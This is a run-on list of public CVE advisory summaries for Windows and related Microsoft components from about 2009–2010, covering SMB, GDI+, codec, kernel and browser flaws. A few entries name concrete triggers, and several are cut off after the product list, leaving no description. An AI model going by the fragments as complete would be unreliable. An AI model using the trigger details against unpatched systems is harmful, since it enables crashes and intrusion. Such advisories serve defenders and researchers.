The Hyper-V server implementation in Microsoft Windows Server 2008 Gold, SP2, and R2 on the x64 platform allows guest OS users to cause a denial of service (host OS hang) via a crafted application that executes a malformed series of machine instructions, aka "Hyper-V Instruction Set Validation Vulnerability." [CVE-2010-0025] The SMTP component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Server 2008 Gold, SP2, and R2, and Exchange Server 2000 SP3, does not properly allocate memory for SMTP command replies, which allows remote attackers to read fragments of e-mail messages by sending a series of invalid commands and then sending a STARTTLS command, aka "SMTP Memory Allocation Vulnerability." [CVE-2010-0024] The SMTP component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Server 2008 Gold, SP2, and R2, and Exchange Server 2003 SP2, does not properly parse MX records, which allows remote DNS servers to cause a denial of service (service outage) via a crafted response to a DNS MX record query, aka "SMTP Server MX Record Vulnerability." [CVE-2010-0023] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly kill processes after a logout, which allows local users to obtain sensitive information or gain privileges via a crafted application that continues to execute throughout the logout of one user and the login session of the next user, aka "CSRSS Local Privilege Elevation Vulnerability." [CVE-2010-0022] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate the share and servername fields in SMB packets, which allows remote attackers to cause a denial of service (system hang) via a crafted packet, aka "SMB Null Pointer Vulnerability." [CVE-2010-0021] Multiple race conditions in the SMB implementation in the Server service in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allow remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 Negotiate packet, aka "SMB Memory Corruption Vulnerability." [CVE-2010-0020] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate request fields, which allows remote authenticated users to execute arbitrary code via a malformed request, aka "SMB Pathname Overflow Vulnerability." [CVE-2010-0019] Microsoft Silverlight 3 before 3.0.50611.0 on Windows, and before 3.0.41130.0 on Mac OS X, does not properly handle pointers, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and framework outage) via a crafted web site, aka "Microsoft Silverlight Memory Corruption Vulnerability." [CVE-2010-0018] Integer overflow in the Embedded OpenType (EOT) Font Engine (t2embed.dll) in Microsoft Windows 2000 SP4 [CVE-2010-0017] Race condition in the SMB client implementation in Microsoft Windows Server 2008 R2 and Windows 7 allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code, and in the SMB client implementation in Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows local users to gain privileges, via a crafted SMB Negotiate response, aka "SMB Client Race Condition Vulnerability." [CVE-2010-0016] The SMB client implementation in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly validate response fields, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted response, aka "SMB Client Pool Corruption Vulnerability." [CVE-2009-4313] ir32_32.dll 3.24.15.3 in the Indeo32 codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to cause a denial of service (heap corruption) or execute arbitrary code via malformed data in a stream in a media file, as demonstrated by an AVI file. [CVE-2009-4312] Unspecified vulnerability in the Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted media content, as reported to Microsoft by Dave Lenoe of Adobe. [CVE-2009-4311] Unspecified vulnerability in the Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted media content, as reported to Microsoft by Paul Byrne of NGS Software. NOTE: this might overlap CVE-2008-3615. [CVE-2009-4310] Stack-based buffer overflow in the Intel Indeo41 codec for Windows Media Player in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted compressed video data in an IV41 stream in a media file, leading to many loop iterations, as demonstrated by data in an AVI file. [CVE-2009-4309] Heap-based buffer overflow in the Intel Indeo41 codec for Windows Media Player in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via a large size value in a movi record in an IV41 stream in a media file, as demonstrated by an AVI file. [CVE-2009-4210] The Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted media content. [CVE-2009-3678] Integer overflow in cdd.dll in the Canonical Display Driver (CDD) in Microsoft Windows Server 2008 R2 and Windows 7 on 64-bit platforms, when the Windows Aero theme is installed, allows context-dependent attackers to cause a denial of service (reboot) or possibly execute arbitrary code via a crafted image file that triggers incorrect data parsing after user-mode data is copied to kernel mode, as demonstrated using "Browse with Irfanview" and certain actions on a folder containing a large number of thumbnail images in Resample mode, possibly related to the ATI graphics driver or win32k.sys, aka "Canonical Display Driver Integer Overflow Vulnerability." [CVE-2009-3677] The Internet Authentication Service (IAS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold and SP1, and Server 2008 Gold does not properly verify the credentials in an MS-CHAP v2 Protected Extensible Authentication Protocol (PEAP) authentication request, which allows remote attackers to access network resources via a malformed request, aka "MS-CHAP Authentication Bypass Vulnerability." [CVE-2009-3676] The SMB client in the kernel in Microsoft Windows Server 2008 R2 and Windows 7 allows remote SMB servers and man-in-the-middle attackers to cause a denial of service (infinite loop and system hang) via a (1) SMBv1 or (2) SMBv2 response packet that contains (a) an incorrect length value in a NetBIOS header or (b) an additional length field at the end of this response packet, aka "SMB Client Incomplete Response Vulnerability." [CVE-2009-3675] LSASS.exe in the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote authenticated users to cause a denial of service (CPU consumption) via a malformed ISAKMP request over IPsec, aka "Local Security Authority Subsystem Service Resource Exhaustion Vulnerability." [CVE-2009-3294] The popen API function in TSRM/tsrm_win32.c in PHP before 5.2.11 and 5.3.x before 5.3.1, when running on certain Windows operating systems, allows context-dependent attackers to cause a denial of service (crash) via a crafted (1) "e" or (2) "er" string in the second argument (aka mode), possibly related to the _fdopen function in the Microsoft C runtime library. NOTE: this might not cross privilege boundaries except in rare cases in which the mode argument is accessible to an attacker outside of an application that uses the popen function. [CVE-2009-3126] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted PNG image file, aka "GDI+ PNG Integer Overflow Vulnerability." [CVE-2009-3103] Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, aka "SMBv2 Negotiation Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2009-3020] win32k.sys in Microsoft Windows Server 2003 SP2 allows remote attackers to cause a denial of service (system crash) by referencing a crafted .eot file in the src descriptor of an @font-face Cascading Style Sheets (CSS) rule in an HTML document, possibly related to the Embedded OpenType (EOT) Font Engine, a different vulnerability than CVE-2006-0010, CVE-2009-0231, and CVE-2009-0232. NOTE: some of these details are obtained from third party information. [CVE-2009-3019] Microsoft Internet Explorer 6 on Windows XP SP2 and SP3, and Internet Explorer 7 on Vista, allows remote attackers to cause a denial of service (application crash) via JavaScript code that calls createElement to create an instance of the LI element, and then calls setAttribute to set the value attribute. [CVE-2009-2764] Microsoft Internet Explorer 8.0.7100.0 on Windows 7 RC on the x64 platform allows remote attackers to cause a denial of service (application crash) via a certain DIV element in conjunction with SCRIPT elements that have empty contents and no reference to a valid external script location. [CVE-2009-2655] mshtml.dll in Microsoft Internet Explorer 7 and 8 on Windows XP SP3 allows remote attackers to cause a denial of service (application crash) by calling the JavaScript findText method with a crafted Unicode string in the first argument, and only one additional argument, as demonstrated by a second argument of -1. [CVE-2009-2653] DISPUTED The NtUserConsoleControl function in win32k.sys in Microsoft Windows XP SP2 and SP3, and Server 2003 before SP1, allows local administrators to bypass unspecified "security software" and gain privileges via a crafted call that triggers an overwrite of an arbitrary memory location. NOTE: the vendor disputes the significance of this report, stating that 'the Administrator to SYSTEM "escalation" is not a security boundary we defend.' [CVE-2009-2544] Directory traversal vulnerability in the Marcelo Costa FileServer component 1.0 for Microsoft Windows Live Messenger and Messenger Plus! Live (MPL) allows remote authenticated users to list arbitrary directories and read arbitrary files via a .. (dot dot) in a pathname. [CVE-2009-2532] Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC do not properly process the command value in an SMB Multi-Protocol Negotiate Request packet, which allows remote attackers to execute arbitrary code via a crafted SMBv2 packet to the Server service, aka "SMBv2 Command Value Vulnerability." [CVE-2009-2527] Heap-based buffer overflow in Microsoft Windows Media Player 6.4 allows remote attackers to execute arbitrary code via (1) a crafted ASF file or (2) crafted streaming content, aka "WMP Heap Overflow Vulnerability." [CVE-2009-2526] Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 do not properly validate fields in SMBv2 packets, which allows remote attackers to cause a denial of service (infinite loop and system hang) via a crafted packet to the Server service, aka "SMBv2 Infinite Loop Vulnerability." [CVE-2009-2525] Microsoft Windows Media Runtime, as used in DirectShow WMA Voice Codec, Windows Media Audio Voice Decoder, and Audio Compression Manager (ACM), does not properly initialize unspecified functions within compressed audio files, which allows remote attackers to execute arbitrary code via (1) a crafted media file or (2) crafted streaming content, aka "Windows Media Runtime Heap Corruption Vulnerability." [CVE-2009-2524] Integer underflow in the NTLM authentication feature in the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to cause a denial of service (reboot) via a malformed packet, aka "Local Security Authority Subsystem Service Integer Overflow Vulnerability." [CVE-2009-2519] The DHTML Editing Component ActiveX control in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly format HTML markup, which allows remote attackers to execute arbitrary code via a crafted web site that triggers "system state" corruption, aka "DHTML Editing Component ActiveX Control Vulnerability." [CVE-2009-2517] The kernel in Microsoft Windows Server 2003 SP2 does not properly handle unspecified exceptions when an error condition occurs, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2009-2516] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold and SP1, and Server 2008 Gold does not properly validate data sent from user mode, which allows local users to gain privileges via a crafted PE .exe file that triggers a NULL pointer dereference during chain traversal, aka "Windows Kernel NULL Pointer Dereference Vulnerability." [CVE-2009-2515] Integer underflow in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows local users to gain privileges via a crafted application that triggers an incorrect truncation of a 64-bit integer to a 32-bit integer, aka "Windows Kernel Integer Underflow Vulnerability." [CVE-2009-2514] win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not correctly parse font code during construction of a directory-entry table, which allows remote attackers to execute arbitrary code via a crafted Embedded OpenType (EOT) font, aka "Win32k EOT Parsing Vulnerability." [CVE-2009-2513] The Graphics Device Interface (GDI) in win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Insufficient Data Validation Vulnerability." [CVE-2009-2511] Integer overflow in the CryptoAPI component in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows man-in-the-middle attackers to spoof arbitrary SSL servers and other entities via an X.509 certificate that has a malformed ASN.1 Object Identifier (OID) and was issued by a legitimate Certification Authority, aka "Integer Overflow in X.509 Object Identifiers Vulnerability." [CVE-2009-2510] The CryptoAPI component in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, as used by Internet Explorer and other applications, does not properly handle a '\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, aka "Null Truncation in X.509 Common Name Vulnerability," a related issue to CVE-2009-2408. [CVE-2009-2509] Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly validate headers in HTTP requests, which allows remote authenticated users to execute arbitrary code via a crafted request to an IIS web server, aka "Remote Code Execution in ADFS Vulnerability." [CVE-2009-2508] The single sign-on implementation in Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly remove credentials at the end of a network session, which allows physically proximate attackers to obtain the credentials of a previous user of the same web browser by using data from the browser's cache, aka "Single Sign On Spoofing in ADFS Vulnerability." [CVE-2009-2507] A certain ActiveX control in the Indexing Service in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly process URLs, which allows remote attackers to execute arbitrary programs via unspecified vectors that cause a "vulnerable binary" to load and run, aka "Memory Corruption in Indexing Service Vulnerability." [CVE-2009-2505] The Internet Authentication Service (IAS) in Microsoft Windows Vista SP2 and Server 2008 SP2 does not properly validate MS-CHAP v2 Protected Extensible Authentication Protocol (PEAP) authentication requests, which allows remote attackers to execute arbitrary code via crafted structures in a malformed request, aka "Internet Authentication Service Memory Corruption Vulnerability." [CVE-2009-2504] Multiple integer overflows in unspecified APIs in GDI+ in Microsoft .NET Framework 1.1 SP1, .NET Framework 2.0 SP1 and SP2, Windows XP SP2 and SP3, Windows Server 2003 SP2, Vista Gold and SP1, Server 2008 Gold, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allow remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "GDI+ .NET API Vulnerability." [CVE-2009-2503] GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Windows Server 2003 SP2, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 does not properly allocate an unspecified buffer, which allows remote attackers to execute arbitrary code via a crafted TIFF image file that triggers memory corruption, aka "GDI+ TIFF Memory Corruption Vulnerability." [CVE-2009-2502] Buffer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted TIFF image file, aka "GDI+ TIFF Buffer Overflow Vulnerability." [CVE-2009-2501] Heap-based buffer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted PNG image file, aka "GDI+ PNG Heap Overflow Vulnerability." [CVE-2009-2500] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted WMF image file, aka "GDI+ WMF Integer Overflow Vulnerability." [CVE-2009-2499] Microsoft Windows Media Format Runtime 9.0, 9.5, and 11 [CVE-2009-2498] Microsoft Windows Media Format Runtime 9.0, 9.5, and 11 and Windows Media Services 9.1 and 2008 do not properly parse malformed headers in Advanced Systems Format (ASF) files, which allows remote attackers to execute arbitrary code via a crafted (1) .asf, (2) .wmv, or (3) .wma file, aka "Windows Media Header Parsing Invalid Free Vulnerability." [CVE-2009-2494] The Active Template Library (ATL) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via vectors related to erroneous free operations after reading a variant from a stream and deleting this variant, aka "ATL Object Type Mismatch Vulnerability." [CVE-2009-2484] Stack-based buffer overflow in the Win32AddConnection function in modules/access/smb.c in VideoLAN VLC media player 0.9.9, when running on Microsoft Windows, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long smb URI in a playlist file. [CVE-2009-2357] The default configuration of TekRADIUS 3.0 uses the sa account to communicate with Microsoft SQL Server, which makes it easier for remote attackers to obtain privileged access to the database and the underlying Windows operating system. [CVE-2009-1930] The Telnet service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote Telnet servers to execute arbitrary code on a client machine by replaying the NTLM credentials of a client user, aka "Telnet Credential Reflection Vulnerability," a related issue to CVE-2000-0834. [CVE-2009-1929] Heap-based buffer overflow in the Microsoft Terminal Services Client ActiveX control running RDP 6.1 on Windows XP SP2, Vista SP1 or SP2, or Server 2008 Gold or SP2 [CVE-2009-1928] Stack consumption vulnerability in the LDAP service in Active Directory on Microsoft Windows 2000 SP4, Server 2003 SP2, and Server 2008 Gold and SP2 [CVE-2009-1926] Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to cause a denial of service (TCP outage) via a series of TCP sessions that have pending data and a (1) small or (2) zero receive window size, and remain in the FIN-WAIT-1 or FIN-WAIT-2 state indefinitely, aka "TCP/IP Orphaned Connections Vulnerability." [CVE-2009-1925] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 does not properly manage state information, which allows remote attackers to execute arbitrary code by sending packets to a listening service, and thereby triggering misinterpretation of an unspecified field as a function pointer, aka "TCP/IP Timestamps Code Execution Vulnerability." [CVE-2009-1924] Integer overflow in the Windows Internet Name Service (WINS) component for Microsoft Windows 2000 SP4 allows remote WINS replication partners to execute arbitrary code via crafted data structures in a packet, aka "WINS Integer Overflow Vulnerability." [CVE-2009-1923] Heap-based buffer overflow in the Windows Internet Name Service (WINS) component for Microsoft Windows 2000 SP4 and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted WINS replication packet that triggers an incorrect buffer-length calculation, aka "WINS Heap Overflow Vulnerability." [CVE-2009-1922] The Message Queuing (aka MSMQ) service for Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP2, and Vista Gold does not properly validate unspecified IOCTL request data from user mode before passing this data to kernel mode, which allows local users to gain privileges via a crafted request, aka "MSMQ Null Pointer Vulnerability." [CVE-2009-1920] The JScript scripting engine 5.1, 5.6, 5.7, and 5.8 in JScript.dll in Microsoft Windows, as used in Internet Explorer, does not properly load decoded scripts into memory before execution, which allows remote attackers to execute arbitrary code via a crafted web site that triggers memory corruption, aka "JScript Remote Code Execution Vulnerability." [CVE-2009-1808] Microsoft Windows XP SP3 allows local users to cause a denial of service (system crash) by making an SPI_SETDESKWALLPAPER SystemParametersInfo call with an improperly terminated pvParam argument, followed by an SPI_GETDESKWALLPAPER SystemParametersInfo call. [CVE-2009-1761] The message engine in CA ARCserve Backup r12.0 and r12.0 SP1 for Windows allows remote attackers to cause a denial of service (crash) via (1) an invalid 0x13 message, which is not properly handled in the ASCORE module, or (2) a 0x3B message with invalid stub data that triggers an RPC marshalling error. [CVE-2009-1546] Integer overflow in Avifil32.dll in the Windows Media file handling functionality in Microsoft Windows allows remote attackers to execute arbitrary code on a Windows 2000 SP4 system via a crafted AVI file, or cause a denial of service on a Windows XP SP2 or SP3, Server 2003 SP2, Vista Gold, SP1, or SP2, or Server 2008 Gold or SP2 system via a crafted AVI file, aka "AVI Integer Overflow Vulnerability." [CVE-2009-1545] Unspecified vulnerability in Avifil32.dll in the Windows Media file handling functionality in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a malformed header in a crafted AVI file, aka "Malformed AVI Header Vulnerability." [CVE-2009-1539] The QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 does not properly validate unspecified size fields in QuickTime media files, which allows remote attackers to execute arbitrary code via a crafted file, aka "DirectX Size Validation Vulnerability." [CVE-2009-1538] The QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 performs updates to pointers without properly validating unspecified data values, which allows remote attackers to execute arbitrary code via a crafted QuickTime media file, aka "DirectX Pointer Validation Vulnerability." [CVE-2009-1537] Unspecified vulnerability in the QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted QuickTime media file, as exploited in the wild in May 2009, aka "DirectX NULL Byte Overwrite Vulnerability." [CVE-2009-1533] Buffer overflow in the Works for Windows document converters in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, Office 2007 SP1, and Works 8.5 and 9 allows remote attackers to execute arbitrary code via a crafted Works .wps file that triggers memory corruption, aka "File Converter Buffer Overflow Vulnerability." [CVE-2009-1532] Microsoft Internet Explorer 8 for Windows XP SP2 and SP3 [CVE-2009-1531] Microsoft Internet Explorer 7 for Windows XP SP2 and SP3 [CVE-2009-1530] Use-after-free vulnerability in Microsoft Internet Explorer 7 for Windows XP SP2 and SP3 [CVE-2009-1529] Microsoft Internet Explorer 7 for Windows XP SP2 and SP3 [CVE-2009-1528] Microsoft Internet Explorer 6 and 7 for Windows XP SP2 and SP3 [CVE-2009-1511] GDI+ in Microsoft Windows XP SP3 allows remote attackers to cause a denial of service (infinite loop) via a PNG file that contains a certain large btChunkLen value. [CVE-2009-1335] Microsoft Internet Explorer 7 and 8 on Windows XP and Vista allows remote attackers to cause a denial of service (application hang) via a large document composed of unprintable characters, aka MSRC 9011jr. [CVE-2009-1331] Integer overflow in Microsoft Windows Media Player (WMP) 11.0.5721.5260 allows remote attackers to cause a denial of service (application crash) via a crafted .mid file, as demonstrated by crash.mid. [CVE-2009-1217] Off-by-one error in the GpFont::SetData function in gdiplus.dll in Microsoft GDI+ on Windows XP allows remote attackers to cause a denial of service (stack corruption and application termination) via a crafted EMF file that triggers an integer overflow, as demonstrated by voltage-exploit.emf, aka the "Microsoft GdiPlus EMF GpFont.SetData integer overflow." [CVE-2009-1216] Multiple unspecified vulnerabilities in (1) unlzh.c and (2) unpack.c in the gzip libraries in Microsoft Windows Server 2008, Windows Services for UNIX 3.0 and 3.5, and the Subsystem for UNIX-based Applications (SUA) [CVE-2009-1141] Microsoft Internet Explorer 6 for Windows XP SP2 and SP3 and Server 2003 SP2 allows remote attackers to execute arbitrary code via unspecified DHTML function calls related to a tr element and the "insertion, deletion and attributes of a table cell," which trigger memory corruption when the window is destroyed, aka "DHTML Object Memory Corruption Vulnerability." [CVE-2009-1139] Memory leak in the LDAP service in Active Directory on Microsoft Windows 2000 SP4 and Server 2003 SP2, and Active Directory Application Mode (ADAM) on Windows XP SP2 and SP3 and Server 2003 SP2, allows remote attackers to cause a denial of service (memory consumption and service outage) via (1) LDAP or (2) LDAPS requests with unspecified OID filters, aka "Active Directory Memory Leak Vulnerability." [CVE-2009-1138] The LDAP service in Active Directory on Microsoft Windows 2000 SP4 does not properly free memory for LDAP and LDAPS requests, which allows remote attackers to execute arbitrary code via a request that uses hexadecimal encoding, whose associated memory is not released, related to a "DN AttributeValue," aka "Active Directory Invalid Free Vulnerability." NOTE: this issue is probably a memory leak. [CVE-2009-1133] Heap-based buffer overflow in Microsoft Remote Desktop Connection (formerly Terminal Services Client) running RDP 5.0 through 6.1 on Windows, and Remote Desktop Connection Client for Mac 2.0, allows remote attackers to execute arbitrary code via unspecified parameters, aka "Remote Desktop Connection Heap Overflow Vulnerability." [CVE-2009-1132] Heap-based buffer overflow in the Wireless LAN AutoConfig Service (aka Wlansvc) in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a malformed wireless frame, aka "Wireless Frame Parsing Remote Code Execution Vulnerability." [CVE-2009-1127] win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not correctly validate an argument to an unspecified system call, which allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, aka "Win32k NULL Pointer Dereferencing Vulnerability." [CVE-2009-1126] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly validate the user-mode input associated with the editing of an unspecified desktop parameter, which allows local users to gain privileges via a crafted application, aka "Windows Desktop Parameter Edit Vulnerability." [CVE-2009-1125] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate an argument to an unspecified system call, which allows local users to gain privileges via a crafted application, aka "Windows Driver Class Registration Vulnerability." [CVE-2009-1124] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate user-mode pointers in unspecified error conditions, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Pointer Validation Vulnerability." [CVE-2009-1123] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate changes to unspecified kernel objects, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Desktop Vulnerability." [CVE-2009-1122] The WebDAV extension in Microsoft Internet Information Services (IIS) 5.0 on Windows 2000 SP4 does not properly decode URLs, which allows remote attackers to 